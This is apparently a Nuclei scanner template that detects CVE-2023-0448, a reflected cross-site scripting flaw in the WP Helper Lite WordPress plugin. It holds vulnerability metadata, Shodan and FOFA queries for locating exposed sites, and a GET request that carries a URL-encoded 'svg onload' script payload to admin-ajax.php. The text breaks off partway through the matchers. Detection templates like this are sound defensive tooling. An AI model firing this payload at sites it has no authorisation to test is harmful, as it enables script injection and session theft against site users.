id: CVE-2023-0448 info: name: WP Helper Lite < 4.3 - Cross-Site Scripting author: ritikchaddha severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 - https://nvd.nist.gov/vuln/detail/CVE-2023-0448 - https://github.com/ARPSyndicate/cvemon - https://github.com/JoshuaMart/JoshuaMart classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 epss-score: 0.00119 epss-percentile: 0.46131 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: matbao product: wp_helper_premium framework: wordpress shodan-query: http.html:/wp-content/plugins/wp-helper-lite fofa-query: body=/wp-content/plugins/wp-helper-lite publicwww-query: "/wp-content/plugins/wp-helper-lite" tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - 'contains(body, ">